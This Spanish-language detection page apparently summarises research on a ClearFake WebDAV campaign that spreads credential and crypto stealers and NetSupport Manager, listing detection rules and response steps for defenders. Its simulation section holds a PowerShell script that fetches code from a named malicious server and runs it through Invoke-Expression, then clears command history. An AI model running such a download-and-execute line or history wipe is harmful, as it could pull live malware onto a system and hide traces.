La cadena de infección ClearFake WebDAV entrega Amatera Stealer, ZigCryptoStealer y NetSupport Manager
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Una campaña impulsada por ClearFake está abusando de WebDAV y Cloudflare Workers para distribuir múltiples cargas de malware. La carga principal, Amatera stealer, está diseñada para exfiltrar credenciales y datos relacionados con criptomonedas. Las cargas adicionales incluyen ZigCryptoStealer entregadas a través de un cargador NativeAOT y instancias no autorizadas de NetSupport Manager utilizadas para establecer acceso remoto.
Investigación
Cisco Talos investigó la ejecución sospechosa de DLL basada en WebDAV en una organización gubernamental de Ucrania. El análisis descubrió dos cadenas de infección separadas: una que utiliza un pf.ch cargador para desplegar ZigCryptoStealer y un proxy inverso basado en Go, y otra que usa un verification.google cargador para instalar NetSupport Manager.
Mitigación
Las organizaciones deben restringir la ejecución de rutas WebDAV y UNC, y monitorear anomalías en rundll32.exe el comportamiento. Se deben utilizar controles EDR robustos para detectar técnicas como el vaciado de DLL y el desplazamiento de módulos. Los equipos de seguridad también deben monitorear el uso no autorizado de NetSupport Manager y la actividad de red relacionada con blockchain sospechosa.
Respuesta
Si se detecta actividad maliciosa, los puntos finales afectados deben ser aislados inmediatamente para prevenir una exfiltración de datos adicional. Los respondedores deben realizar análisis forenses de memoria para identificar malware residente como Amatera. Los equipos de seguridad también deben buscar ejecución de DLL basada en WebDAV y actividad inusual de PowerShell en todo el entorno.
Flujo de Ataque
Todavía estamos actualizando esta parte.
Detecciones
Cadenas de PowerShell sospechosas (a través de PowerShell)
LOLBAS Conhost (a través de cmdline)
Indicadores de ofuscación de PowerShell posibles (a través de PowerShell)
Abuso posible de Telegram como canal de Comando y Control (a través de dns_query)
Comando y Control sospechoso por solicitud de DNS de dominio de nivel superior (TLD) inusual (a través de dns)
IOCs (SourceIP) para detectar: la cadena de infección ClearFake WebDAV entrega Amatera stealer, ZigCryptoStealer y NetSupport Manager
IOCs (DestinationIP) para detectar: la cadena de infección ClearFake WebDAV entrega Amatera stealer, ZigCryptoStealer y NetSupport Manager
Comunicación C2 a través de WebSocket seguro con Dubbedmuch para exfiltración de datos [Proxy]
Detectar descarga y ejecución de script de PowerShell de NetSupport Manager [Windows PowerShell]
Ejecución de DLL WebDAV vía rundll32.exe [Creación de procesos Windows]
Ejecución de simulación
Requisito previo: La verificación de Telemetría y Línea base debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica adversaria (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTP identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico incorrecto.
-
Narrativa de Ataque y Comandos: El adversario está simulando una cadena de infección «ClearFake». El objetivo es desplegar la herramienta de acceso remoto NetSupport Manager para establecer persistencia y control remoto. Para evitar la detección basada en firmas de descargas de archivos, el atacante utiliza un comando de PowerShell «one-liner» que obtiene una carga útil de JavaScript/PowerShell de un servidor C2 remoto (
https://kr.cedar2glanz.ru/jewel.js) y la ejecuta directamente en el búfer de memoria usandoInvoke-Expression. Esta técnica deja una huella de disco mínima. -
Script de Prueba de Regresión:
# Script de Simulación: Imita la ejecución de carga útil de la cadena de infección ClearFake # ADVERTENCIA: Este script utiliza la URL maliciosa específica definida en la regla de detección para activar una alerta. $maliciousUrl = "https://kr.cedar2glanz.ru/jewel.js" Write-Host "[+] Simulando descarga y ejecución maliciosa de PowerShell..." -ForegroundColor Yellow # Este comando imita el patrón exacto: URL + IEX/Invoke-Expression # Usamos un bloque try/catch porque la URL está realmente inaccesible/inactiva, # pero la LÍNEA DE COMANDO DEL PROCESO aún se registrará. try { Invoke-Expression (New-Object Net.WebClient).DownloadString($maliciousUrl) } catch { Write-Host "[!] Comando ejecutado (se espera error de red, pero debería generarse telemetría)." -ForegroundColor Cyan } -
Comandos de Limpieza:
# No se crean archivos por esta prueba específica de ejecución en memoria. # Sin embargo, limpiamos el historial de comandos para eliminar rastros de la sesión de usuario local. Clear-History Write-Host "[+] Limpieza completa. No quedan artefactos en el disco." -ForegroundColor Green